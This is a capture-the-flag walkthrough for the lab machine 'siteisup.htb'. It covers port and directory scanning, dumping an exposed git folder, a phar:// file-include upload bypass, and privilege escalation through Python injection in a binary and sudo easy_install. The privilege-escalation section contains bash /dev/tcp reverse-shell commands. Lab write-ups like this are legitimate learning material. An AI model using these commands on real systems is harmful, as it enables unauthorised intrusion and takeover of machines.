
Information Gathering

Port Scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-16 10:52 WIB
Nmap scan report for
Host is up (0.028s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds

Directory and Files Scan

feroxbuster -u http://siteisup.htb/ -d 2 -w /usr/share/wordlists/dirb/common.txt
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.10.3
 🎯  Target Url            β”‚ http://siteisup.htb/
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/wordlists/dirb/common.txt
 πŸ‘Œ  Status Codes          β”‚ All Status Codes!
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.10.3
 πŸ’‰  Config File           β”‚ /etc/feroxbuster/ferox-config.toml
 πŸ”Ž  Extract Links         β”‚ true
 🏁  HTTP methods          β”‚ [GET]
 πŸ”ƒ  Recursion Depth       β”‚ 2
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
403      GET        9l       28w      277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                             
404      GET        9l       31w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter                                                                                                             
200      GET      320l      675w     5531c http://siteisup.htb/stylesheet.css
200      GET       40l       93w     1131c http://siteisup.htb/
301      GET        9l       28w      310c http://siteisup.htb/dev => http://siteisup.htb/dev/
200      GET        1l        2w       21c http://siteisup.htb/dev/.git/HEAD
200      GET       40l       93w     1131c http://siteisup.htb/index.php
200      GET        0l        0w        0c http://siteisup.htb/dev/index.php
[####################] - 11s     9233/9233    0s      found:6       errors:2      
[####################] - 9s      4614/4614    509/s   http://siteisup.htb/ 
[####################] - 9s      4614/4614    503/s   http://siteisup.htb/dev/  

Initial Access

use https://github.com/arthaud/git-dumper for dumping the exposed git folder

python3 git_dumper.py http://siteisup.htb/dev/ siteisup

we can see the interesting code in index.php and checker.php files


        if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
                include($_GET['page'] . ".php");


    $file = $_FILES['file']['name'];

        # Check if extension is allowed.
        $ext = getExtension($file);
                die("Extension not allowed!");
        # Create directory to upload our file.
        $dir = "uploads/".md5(time())."/";
        mkdir($dir, 0770, true);
  # Upload the file.
        $final_path = $dir.$file;
        move_uploaded_file($_FILES['file']['tmp_name'], "{$final_path}");

index.php doing include file, so we can call the uploaded file using phar://

first, we need to compress our payload to zip format, but we need to use another random extension to bypass upload filter

zip x.yha x.php

then upload it

next, access the url and listener will triggered


Privilege Escalation

here we under www-data users, we can escalate to developer user via exploiting siteisup binary in /home/developer/dev/ directory

www-data@updown:/home/developer/dev$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__("os").system("id")
uid=1002(developer) gid=33(www-data) groups=33(www-data)
www-data@updown:/home/developer/dev$ ./siteisup
Welcome to 'siteisup.htb' application

Enter URL here:__import__("os").system("bash -c 'bash -i >& /dev/tcp/ 0>&1'")

next, we can escalate to root via easy_install because developer user have sudo access in easy_install

developer@updown:/home/developer/dev$ sudo -l
sudo -l
Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass,

User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install
TF=$(mktemp -d)
echo "import os; os.system('bash -c \"bash -i >& /dev/tcp/ 0>&1\"')" > $TF/setup.py
sudo easy_install $TF